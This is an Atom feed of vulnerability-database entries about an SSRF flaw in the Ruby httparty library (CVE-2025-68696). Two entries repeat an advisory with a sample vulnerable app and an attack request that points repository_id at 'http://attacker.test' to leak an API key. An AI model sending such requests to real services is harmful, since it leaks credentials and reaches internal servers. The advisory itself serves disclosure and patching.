<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-06T19:57:01.666391+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/brew-gitlab-gem-cve-2025-68696</id>
    <title>BREW-gitlab-gem-CVE-2025-68696 — httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage</title>
    <updated>2026-10-06T19:57:01.669488+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Homebrew: gitlab-gem</p>
<p>## Summary</p>
<p>There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.</p>
<p>## Details</p>
<p>When httparty receives a path argument that is an absolute URL, it ignores the `base_uri` field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.</p>
<p>Consider the following example of a web application:</p>
<p>```rb
require 'sinatra'
require 'httparty'</p>
<p>class RepositoryClient
  include HTTParty
  base_uri 'http://exmaple.test/api/v1/repositories/'
  headers 'X-API-KEY' =&gt; '1234567890'
end</p>
<p>post '/issue' do
  request_body = JSON.parse(request.body.read)
  RepositoryClient.get(request_body['repository_id']).body
  # do something
  json message: 'OK'
end
```</p>
<p>Now, suppose an attacker sends a request like this:</p>
<p>```
POST /issue HTTP/1.1
Host: localhost:10000
Content-Type: application/json</p>
<p>{
    "repository_id": "http://attacker.test",
    "title": "test"
}
```</p>
<p>In this case, httparty sends the `X-API-KEY` not to `http://example.test` but instead to `http://attacker.test`.</p>
<p>A similar problem was reported and fixed in the HTTP client library axios in the past:  
&lt;https://github.com/axios/axios/issues/6463&gt;</p>
<p>Also, Python's `urljoin` function has documented a warning about similar behavior:  
&lt;https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin&gt;</p>
<p>## PoC</p>
<p>Follow the…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/brew-gitlab-gem-cve-2025-68696"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-264332</id>
    <title>EUVD-2026-264332</title>
    <updated>2026-10-06T19:57:01.669564+00:00</updated>
    <content>EUVD-2026-264332</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-264332"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2025-68696</id>
    <title>fkie_cve-2025-68696</title>
    <updated>2026-10-06T19:57:01.669581+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>httparty is an API tool. In versions 0.23.2 and prior, httparty is vulnerable to SSRF. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers. This issue has been patched via commit 0529bcd.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2025-68696"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-hm5p-x4rq-38w4</id>
    <title>GHSA-hm5p-x4rq-38w4 — httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage</title>
    <updated>2026-10-06T19:57:01.669603+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> RubyGems: httparty</p>
<p>## Summary</p>
<p>There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.</p>
<p>## Details</p>
<p>When httparty receives a path argument that is an absolute URL, it ignores the `base_uri` field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.</p>
<p>Consider the following example of a web application:</p>
<p>```rb
require 'sinatra'
require 'httparty'</p>
<p>class RepositoryClient
  include HTTParty
  base_uri 'http://exmaple.test/api/v1/repositories/'
  headers 'X-API-KEY' =&gt; '1234567890'
end</p>
<p>post '/issue' do
  request_body = JSON.parse(request.body.read)
  RepositoryClient.get(request_body['repository_id']).body
  # do something
  json message: 'OK'
end
```</p>
<p>Now, suppose an attacker sends a request like this:</p>
<p>```
POST /issue HTTP/1.1
Host: localhost:10000
Content-Type: application/json</p>
<p>{
    "repository_id": "http://attacker.test",
    "title": "test"
}
```</p>
<p>In this case, httparty sends the `X-API-KEY` not to `http://example.test` but instead to `http://attacker.test`.</p>
<p>A similar problem was reported and fixed in the HTTP client library axios in the past:  
&lt;https://github.com/axios/axios/issues/6463&gt;</p>
<p>Also, Python's `urljoin` function has documented a warning about similar behavior:  
&lt;https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin&gt;</p>
<p>## PoC</p>
<p>Follow the…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-hm5p-x4rq-38w4"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ubuntu-cve-2025-68696</id>
    <title>UBUNTU-CVE-2025-68696</title>
    <updated>2026-10-06T19:57:01.669649+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Ubuntu:16.04:LTS: ruby-httparty, Ubuntu:18.04:LTS: ruby-httparty, Ubuntu:20.04:LTS: ruby-httparty, Ubuntu:22.04:LTS: ruby-httparty, Ubuntu:24.04:LTS: ruby-httparty, Ubuntu:25.10: ruby-httparty, Ubuntu:26.04:LTS: ruby-httparty</p>
<p>httparty is an API tool. In versions 0.23.2 and prior, httparty is vulnerable to SSRF. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers. This issue has been patched via commit 0529bcd.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ubuntu-cve-2025-68696"/>
  </entry>
</feed>
